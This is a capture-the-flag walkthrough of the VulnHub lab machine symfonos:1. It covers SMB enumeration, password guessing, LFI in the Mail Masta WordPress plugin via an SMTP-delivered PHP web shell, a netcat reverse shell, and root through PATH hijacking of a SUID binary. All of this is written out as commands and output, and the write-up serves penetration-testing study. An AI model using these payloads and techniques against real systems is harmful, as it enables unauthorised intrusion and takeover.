Details
This machine is https://www.vulnhub.com/entry/symfonos-1,322/
Recon Phase
First locate the machine on the network
root@kali:~# nmap -sn -T4 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00024s latency).
MAC Address: 0A:00:27:00:00:12 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00010s latency).
MAC Address: 08:00:27:B5:FC:6F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.00020s latency).
MAC Address: 08:00:27:83:2E:8E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.99 secondsThen a service discovery scan
root@kali:~# nmap -sV -p- -T4 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.00012s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.25 ((Debian))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:83:2E:8E (Oracle VirtualBox virtual NIC)
Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.15 secondsShell Hunting
First, smb
root@kali:~# smbmap -H 192.168.56.101
[+] Finding open SMB ports....
[+] Guest SMB session established on 192.168.56.101...
[+] IP: 192.168.56.101:445 Name: 192.168.56.101
Disk Permissions
---- -----------
print$ NO ACCESS
helios NO ACCESS
anonymous READ ONLY
IPC$ NO ACCESSHelios could be a username, but lets try smbclient
root@kali:~# smbclient -L 192.168.56.101
Enter WORKGROUP\root's password: I just hit enter
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
helios Disk Helios personal share
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SYMFONOS
Then mount the anonymous one
root@kali:~# mount -v //192.168.56.101/anonymous /tmp/mounted/
Password for root@//192.168.56.101/anonymous: Just hit enter again
mount.cifs kernel mount options: ip=192.168.56.101,unc=\\192.168.56.101\anonymous,user=root,pass=********
root@kali:~# cd /tmp/mounted
root@kali:/tmp/mounted# ls -la
drwxr-xr-x 2 root root 0 Jun 28 21:14 .
drwxrwxrwt 19 root root 4096 Jul 3 15:28 ..
-rwxr-xr-x 1 root root 154 Jun 28 21:14 attention.txt
root@kali:/tmp/mounted# cat attention.txt
Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'!
Next person I find using one of these passwords will be fired!
-ZeusThere was a share called helios, which seemed like a username, and now 3 potential passwords of
epidioko
qwerty
baseballI’ll try mounting helios with these
root@kali:~# mount -v //192.168.56.101/helios /tmp/mounted2/ -o username=helios
Password for helios@//192.168.56.101/helios: Using
qwerty
mount.cifs kernel mount options: ip=192.168.56.101,unc=\\192.168.56.101\helios,user=helios,pass=********More to look at then
root@kali:/tmp/mounted2# ls -la
drwxr-xr-x 2 root root 0 Jun 28 20:32 .
drwxrwxrwt 20 root root 4096 Jul 3 15:35 ..
-rwxr-xr-x 1 root root 432 Jun 28 20:32 research.txt
-rwxr-xr-x 1 root root 52 Jun 28 20:32 todo.txt
root@kali:/tmp/mounted2# cat research.txt
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
root@kali:/tmp/mounted2# cat todo.txt
1. Binge watch Dexter
2. Dance
3. Work on /h3l105So that looks like a directory in a domain, off to http://192.168.56.101
Then http://192.168.56.101/h3l105
Broken wordpress site, from the source I can see I need to add to hosts to fix it
root@kali:~# echo "192.168.56.101 symfonos.local" >> /etc/hosts Now try http://symfonos.local/h3l105/
Now I can wpscan it
root@kali:~# wpscan --url symfonos.local/h3l105/ -e
[SNIP]
[+] mail-masta
| Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
| References:
| - https://wpvulndb.com/vulnerabilities/8609
| - https://www.exploit-db.com/exploits/40290/
| - https://cxsecurity.com/issue/WLB-2016080220
|
| [!] Title: Mail Masta 1.0 - Multiple SQL Injection
| References:
| - https://wpvulndb.com/vulnerabilities/8740
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098
| - https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
|
| Version: 1.0 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
[+] site-editor
| Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
| References:
| - https://wpvulndb.com/vulnerabilities/9044
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
| - http://seclists.org/fulldisclosure/2018/Mar/40
| - https://github.com/SiteEditor/editor/issues/2
|
| Version: 1.1.1 (80% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://symfonos.local/h3l105/wp-content/plugins/site-editor/readme.txt
[SNIP]Tested one of the LFIs http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
So I spent a while looking for a log file I could influence and include, but couldn’t find one, so I tried using the smtp to email helios and include that instead
root@kali:~# nc symfonos.local 25
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
HELO symfonos.local
250 symfonos.localdomain
MAIL FROM: [email protected]
250 2.1.0 Ok
RCPT TO: helios
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']) ?>
.
250 2.0.0 Ok: queued as F3034406ABNow include it http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=id
The result of id can be seen in the file so it worked, now for a reverse shell
root@kali:~# nc -nlvp 4444Trigger it http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc 192.168.56.101 4444 -e /bin/bash
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 42156There is a shell
python -c "import pty;pty.spawn('/bin/bash')"
<h3l105/wp-content/plugins/mail-masta/inc/campaign$ Root Hunting
I looked for SUID binaries
helios@symfonos:/home/helios$ find / -perm -u=s 2>/dev/null
[SNIP]
/opt/statuscheck
[SNIP]Interesting
helios@symfonos:/home/helios$ cd /opt
helios@symfonos:/opt$ ls -la
drwxr-xr-x 2 root root 4096 Jun 28 20:21 .
drwxr-xr-x 22 root root 4096 Jun 28 19:27 ..
-rwsr-xr-x 1 root root 8640 Jun 28 20:21 statuscheckSo I dug into it
helios@symfonos:/opt$ strings statuscheck
[SNIP]
curl -I H
http://lH
ocalhostH
[SNIP]So it curls localhost, but it doesn’t use full file paths so it is path poisoning time
helios@symfonos:/opt$ cd /tmp
helios@symfonos:/tmp$ echo "/bin/sh" > curl
helios@symfonos:/tmp$ chmod +x ./curl
helios@symfonos:/tmp$ export PATH=/tmp:$PATH
helios@symfonos:/tmp$ /opt/statuscheck
#A new shell spawned
# id
uid=1000(helios) gid=1000(helios) euid=0(root) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)And rooted
# cd /root
# ls -la
drwx------ 2 root root 4096 Jun 28 21:09 .
drwxr-xr-x 22 root root 4096 Jun 28 19:27 ..
lrwxrwxrwx 1 root root 9 Jun 28 19:48 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 66 Jun 28 21:03 .selected_editor
-rw-r--r-- 1 root root 1735 Jun 28 19:38 proof.txt
# cat proof.txt
Congrats on rooting symfonos:1!
\ __
--==/////////////[})))==*
/ \ ' ,|
`\`\ //| ,|
\ `\ //,/' -~ |
) _-~~~\ |/ / |'| _-~ / ,
(( /' ) | \ / /'/ _-~ _/_-~|
((( ; /` ' )/ /'' _ -~ _-~ ,/'
) )) `~~\ `\\/'/|' __--~~__--\ _-~ _/,
((( )) / ~~ \ /~ __--~~ --~~ __/~ _-~ /
((\~\ | ) | ' / __--~~ \-~~ _-~
`\(\ __--( _/ |'\ / --~~ __--~' _-~ ~|
( ((~~ __-~ \~\ / ___---~~ ~~\~~__--~
~~\~~~~~~ `\-~ \~\ / __--~~~'~~/
;\ __.-~ ~-/ ~~~~~__\__---~~ _..--._
;;;;;;;;' / ---~~~/_.-----.-~ _.._ ~\
;;;;;;;' / ----~~/ `\,~ `\ \
;;;;' ( ---~~/ `:::| `\\.
|' _ `----~~~~' / `:| ()))),
______/\/~ | / / (((((())
/~;;.____/;;' / ___.---( `;;;/ )))'`))
/ // _;______;'------~~~~~ |;;/\ / (( (
// \ \ / | \;;,\ `
(<_ \ \ /',/-----' _>
\_| \\_ //~;~~~~~~~~~
\_| (,~~
\~\
~~
Contact me via Twitter @zayotic to give feedback!